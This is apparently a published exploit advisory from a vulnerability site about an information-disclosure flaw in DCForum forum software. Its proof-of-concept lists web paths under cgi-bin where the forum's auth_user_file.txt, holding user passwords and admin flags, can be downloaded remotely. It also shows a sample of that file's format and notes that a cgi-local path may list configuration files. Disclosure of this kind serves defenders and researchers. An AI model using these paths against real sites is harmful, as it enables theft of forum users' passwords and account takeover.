DCForum Information Disclosure

2012.11.03
Credit: r45c4l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: DCForum Information Disclosure # Date: 01/11/2012 # Author: r45c4l (@r45c4l) # Email: infosecpirate@gmail.com # Script url: http://webscripts.softpedia.com/script/Discussion-Boards/DCForum-20872.html # Version: N/A # CVE : () :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Product Description : DCForum is a complete web conferencing software for building and managing an online discussion community. =================Exploit================================================= ---ICW--- [ EXPL0!T ] p0c - www.site.com/cgi-bin/User_info/auth_user_file.txt www.site.com/cgi-bin/dcforum/User_info/auth_user_file.txt Example of auth_user_file.txt: password|admin|First_Name|Last_Name|mailid@site.com|on password|admin|admin|First_Name|Last_Name|mailid@site.com|on In some cases http://www.site.com/cgi-local will index all the setup and configuration files =========================================================================== Greetz to : Beenu Arora, d3hydr8, Hardeep Singh, micr0, sam, Sai Satish All members of ICW, AH and G4H, and all Indian Hackers Special Greetz to : b4ltazar and s1nn3r and the entire darkc0de.com guys === End () ====

References:

http://webscripts.softpedia.com/script/Discussion-Boards/DCForum-20872.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top